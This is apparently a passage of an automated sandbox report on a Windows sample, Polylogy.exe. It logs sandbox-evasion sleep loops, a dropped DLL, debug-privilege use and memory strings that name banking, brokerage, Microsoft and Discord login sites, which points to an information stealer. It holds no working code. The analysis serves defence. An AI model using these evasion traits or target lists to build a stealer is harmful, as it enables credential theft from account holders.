Source: C:\Users\user\Desktop\Polylogy.exe	Memory allocated: 359C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598498	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594453	Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe	Window / User API: threadDelayed 1137			Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Window / User API: threadDelayed 8713			Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj3433.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Polylogy.exe

API coverage: 1.7 %

Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 2272	Thread sleep count: 1137 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 2272	Thread sleep count: 8713 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598498s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe TID: 4912	Thread sleep time: -594453s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405731
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 0_2_004061E5 FindFirstFileW,FindClose,	0_2_004061E5
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_00402706 FindFirstFileW,	4_2_00402706
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405731
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_004061E5 FindFirstFileW,FindClose,	4_2_004061E5

Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598498	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Thread delayed: delay time: 594453	Jump to behavior

Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005458000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.00000000054B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd50c1797da015<
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036D3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Polylogy.exe, 00000004.00000002.4538260754.000000003705A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Polylogy.exe	API call chain: ExitProcess graph end node			graph_0-4669
Source: C:\Users\user\Desktop\Polylogy.exe	API call chain: ExitProcess graph end node			graph_0-4668

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\Polylogy.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe

Process created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Users\user\Desktop\Polylogy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Polylogy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
